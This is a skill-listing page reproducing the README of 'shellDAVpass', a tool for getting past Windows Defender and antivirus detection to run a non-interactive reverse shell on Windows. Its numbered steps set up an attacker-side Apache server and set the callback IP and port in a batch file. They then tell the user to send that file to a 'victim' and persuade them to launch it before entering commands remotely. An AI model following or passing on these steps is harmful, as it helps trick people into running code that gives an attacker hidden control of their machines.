SkillAgentSearch skills...

ShellDAVpass

shellDAVpass application is the Open-Source project, the main idea of which is to bypass the defender and AntiVirus detections to conduct a non interactive reverse shell to execute the Windows commands

Install / Use

/learn @IvanGlinkin/ShellDAVpass
About this skill

Quality Score

0/100

Supported Platforms

Universal

README

shellDAVpass

shellDAVpass application is the Open-Source project, the main idea of which is to bypass the defender and AntiVirus detections to conduct a non interactive reverse shell to execute the Windows commands

Usage example:

1. Start your HTTP server. For APACHE under Debian (Ubuntu/Kali):
  systemctl start apache2.service 
2. The default port is 80. You are free to change it by editing /etc/apache2/ports.conf
  Listen 80
3. cd /var/www/html
4. git clone https://github.com/IvanGlinkin/shellDAVpass.git
5. chown -R www-data: shellDAVpass
6. cd shellDAVpass
7. nano shellDAVpass.bat
8. Change the IP-address and Port
  SET IPADDRESS=10.211.55.11
  SET PORT=80
9. Save the changings (by pressing CTRL+O and Enter. To exit, press CTRL+X)
10. !!! Send the shellDAVpass.bat to the victim and courage him/her to launch the file !!!
11. Launch the command prompt
  bash shellDAVpass.sh
12. Enter your commands

An original article:

https://www.ivanglinkin.com/shelldavpass-non-interactive-reverse-shell-to-bypass-the-defender-and-antivirus-detections/

Video example:

Watch the video

Screenshots:

View on GitHub
GitHub Stars28
CategoryDevelopment
Updated2mo ago
Forks4

Languages

Shell

Security Score

90/100

Audited on Jan 13, 2026

No findings